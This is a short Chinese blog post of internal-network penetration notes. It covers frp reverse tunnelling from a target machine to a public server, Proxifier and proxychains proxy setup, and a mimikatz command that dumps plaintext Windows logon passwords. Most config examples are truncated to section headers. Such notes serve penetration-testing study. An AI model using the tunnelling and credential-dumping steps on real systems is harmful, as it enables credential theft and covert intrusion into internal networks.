内网渗透笔记
内网渗透总结
代理方法
frp
frp工作原理拓扑图
 
配置
在使用frp之前,首先要对服务端和客户端配置文件(frps.ini & frpc.ini)进行配置
服务端(有公网的机器):frps.ini
| 1 | [common] | 
| 1 | 服务端启动:./frps -c frps.ini | 
客户端(目标机):frpc.ini
| 1 | [common] | 
| 1 | 客户端启动:./frpc -c frpc.ini & | 
连接代理
Proxifier
Proxifier是一款功能非常强大的socks5客户端,可以让不支持通过代理服务器工作的网络程序能通过HTTPS或SOCKS代理或代理链。
 
配置
配置文件 => 代理服务器
 
选中默认的代理服务器配置
 
填写建立的socks代理配置
 
检测连接成功后,右键通过Proxifier代理打开即可
 
Proxychains
一款命令行代理神器,kali3以上默认自带。
ps:proxychains不支持UDP和ICMP

配置
修改配置文件,文件位置为 /etc/proxychains.conf
用vi修改,找到 [ProxyList]
修改内容为:
| 1 | [ProxyList] | 
使用
| 1 | proxyresolv 127.0.0.1 # 检测连接 | 
 
口令破解
mimikatz
无需tty读取明文密码
| 1 | mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords full" "exit" | 

本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Y5neKO's Blog!
 评论